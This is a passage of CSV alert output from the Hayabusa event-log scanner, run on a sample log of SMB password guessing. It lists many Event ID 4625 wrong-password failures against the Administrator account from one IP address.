NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.904 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hyvCpW3aOZqCOldu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.950 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oyhS2wAAkfmZuLll | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.993 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0bEh0KTMbbFtsfck | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mw9u61efa06vYv6L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.092 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SAxij8QYLxxriIvu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.134 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HK2tbzICSpTrglud | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.176 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4rHJ70VrEwCQjSvL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.225 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8qwZT66ExkdJDZaT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.260 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ezuHluj1fEC9KdQ1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bXH5uDfo4WB6QEnQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.336 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yWvZjuZhnGcrelOM | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.434 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vb6ePjmpA8ZwK1PW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.473 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7e1A9ZY20WM8oDn6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.523 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 71GKLnXqSEEuc1Fw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.556 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w0GsW0vDEkpRa1X0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0HH6zUUoL0qlfFC2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.636 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AG4pYsjob1iwlOc0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.677 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dNCX5tZ0nF1foTLW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.710 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vO82Kb0kboVFuJy6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DptE2C8ZK3AxCb43 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.871 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NC8manvVP5pU8F3N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.926 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m00bI5welsLUWmwJ | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4shyxJk2PiH1TDlj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.014 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xZyN2WO3UVY0WQs6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.053 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oSQjAMckifap5r1k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qixqXiX0mVcuXe37 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.126 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gIfJCJz6l36WMeY9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.166 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SZxv5U7uoN6E8c8E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.209 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mlIfE0N32OQeWuNw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nkZcjpTmHcJ0uX38 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.301 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GZfaHr2Yq6xkRjOI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.336 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jvy0EIiPSnom7pn3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.380 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TN9PUb0BgI3u8Xax | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.429 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xCgz5BNpQgLgW0Xi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.478 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: po2GBdrXr3XtBsWR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O2rgo6jHcqu10IGY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.573 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MLblUOGzYzVA47E9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.616 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ysuA1xpYuAGRNONJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.660 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ksedziaGzXk5VNlS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.711 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: irIfGLQdhtRRGwuo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.752 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YCf6WUjiS11hHqKT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1o0CTT7GsWfCWuHx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.832 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F6Jr8XrUsmTiSdol | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.868 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Buj66iuSkLEQdKnQ | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.912 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L1wOLI51HqfkgO6r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.945 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X4oe273WXOICzkwW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.992 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1c7nGezYNJ70jR6R | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.037 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ajuZ09zGeuovCQLg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.081 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: z4k7xV7soNF4mHlz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.116 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CtdqW8zOw1GoQcvA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aY6FLi1edRZWrRZN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.204 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ah1JoKfxJzQhCCVL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gIMOZRGcv4o33BWd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.276 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nmLyLJoVZz6fJ62I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.308 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aGufqEGD4hFf2XLM | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.340 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7IEdKy2H5Agblpjt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.384 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XT9k8C05GVLBNPdl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5opHh8HelCXtR5Cm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.473 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K0dntDwYLmag9efo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.514 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UQfZOMFV9LtY7r2S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.632 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y01v38dTUIsJEZIv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.684 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pCP8x2QBZ6IvMEnf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.739 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hgcbYjw3kKqlK7Di | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.774 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TFU97Tq3e7IWvSKm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.808 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1hUCvaS1yM2FU9AE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.852 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8JInVlBqTSfT4J1s | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.896 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EjXRQUGDKBZaMkw3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.937 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fZPXNxkGOrld5eCR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.978 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OBDhSrF7DZ1KBRa8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.013 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dQ7TKJOGibAVNoCH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.054 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZE1GARxx03m4FtEL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.096 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Gf3VLLTxsK85bsrv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.123 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 58G6MFVbW55JZIV5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.160 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Yxne9LqZCqBf3qkc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.200 